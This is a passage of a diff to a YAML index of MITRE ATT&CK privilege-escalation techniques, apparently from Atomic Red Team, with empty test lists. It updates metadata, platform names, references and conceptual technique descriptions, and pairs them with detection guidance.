         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -17853,12 +18180,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17866,14 +18193,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17888,6 +18214,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -17896,18 +18223,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -17939,9 +18266,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18013,7 +18337,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18040,7 +18363,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18066,13 +18389,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18193,12 +18514,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18230,11 +18550,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18275,11 +18594,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18335,12 +18653,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18397,7 +18714,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18467,7 +18783,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18577,7 +18892,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18631,7 +18945,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18664,13 +18978,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18732,10 +19044,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18793,7 +19104,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18835,7 +19145,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -18894,8 +19204,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -18925,7 +19233,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -18960,12 +19268,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19042,7 +19348,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19081,7 +19386,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19130,8 +19435,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19163,7 +19466,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19211,13 +19514,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19230,16 +19531,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19251,16 +19552,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19315,7 +19616,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19338,7 +19638,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19382,8 +19682,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19460,7 +19758,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19488,8 +19786,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19548,23 +19844,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19574,11 +19869,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19589,12 +19888,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19603,6 +19909,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19611,13 +19918,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19643,10 +19953,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19655,10 +19973,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19675,9 +20003,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19741,7 +20066,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19830,7 +20154,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -19888,7 +20211,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -19913,12 +20236,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -19944,7 +20266,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -19958,7 +20279,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -19985,8 +20305,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
